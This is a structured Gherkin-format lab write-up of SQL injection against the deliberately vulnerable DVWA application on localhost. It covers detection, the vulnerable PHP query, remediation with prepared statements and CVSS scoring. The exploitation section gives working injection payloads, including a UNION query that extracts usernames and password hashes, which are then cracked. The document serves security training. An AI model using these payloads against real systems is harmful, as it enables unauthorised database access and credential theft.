## Version 1.4.1
## language: en

Feature:
  TOE:
    Altoro Mutual
  Category:
    SQL injection
  Location:
    http://localhost/DVWA-master/vulnerabilities/sqli/ - user id (field)
  CWE:
    CWE-89: Improper Neutralization of Special Elements used
    in an SQL Command ('SQL Injection')
  Rule:
    REQ.173: https://fluidattacks.com/web/rules/173/
  Goal:
    Inject SQL to get valuable information
  Recommendation:
    Use prepared statements with variable bindings

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Windows OS      | 10          |
    | Firefox         | 68.0.1      |
    | XAMPP           | 3.2.4       |
  Machine information:
    Given I am accesing the site
    """
    http://localhost/DVWA-master/vulnerabilities/sqli/
    """
    And A field to consult User ID

  Scenario: Normal use case
    Given A field to consult any user id
    When I type '1' i get a response
    """
    ID: 1
    First name: admin
    Surname: admin
    """
    Then I try to consult different words and numbers

  Scenario: Static detection
    When I watch the source code
    Then I can see this code inside a php function
    """
    $id = $_REQUEST[ 'id' ];
    $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
    """
    And I can see the id variable and the query are not sanitized

  Scenario: Dynamic detection
    When Looking at the field
    Then I try to force some errors that can give me a hint
    And I type this text "1'" and press submit button
    And I get this error
    """
    You have an error in your SQL syntax;
    check the manual that corresponds to your MariaDB server version for
    the right syntax to use near ''1''' at line 1
    """
    And I realize that it recognizes SQL queries
    And The URL receives get parameters in the 'id'

  Scenario: Exploitation
    When I type in the URL the following text
    """
    1' order by 1,2,3 --+
    """
    Then I force this error
    """
    Unknown column '3' in 'order clause'
    """
    And I identify that the query accepts 2 columns
    And After this i'm going to extract users and passwords from the database
    When I type this query in the 'id' parameters
    """
    1' union select user,password from users--+
    """
    Then I get this response [evidence](image1.png)
    And I decrypt the passwords hashed in md5
    And I got the credentials i was looking for

  Scenario: Remediation
    When A developer make a search or consult field like this one
    And Identifying that it just search for user id
    Then He can limitate the user input to the length of the user id values
    And He can use variable binding to make the field safer
    When User types some sql code, the field would not allow more than
    And The specified characters length
    And If user tries to send some SQL from the URL it will recognize it
    And As a string value and not as SQL code for the code
    Then The query will look for an user id with this values instead of
    And adding the input to the query
    And The vulnerability could be fixed

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.1/10 (Critical) - AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.2/10 (High) - E:H/RL:W/RC:U
  Environmental: Unique and relevant attributes to a specific user environment
    9.0/10 (Critical) - CR:H/IR:H/MAV:N/MAC:L/MPR:N/MUI:N/MS:C/MC:C/MI:H/MA:N

  Scenario: Correlations
    No correlations have been found to this date 2019-07-30
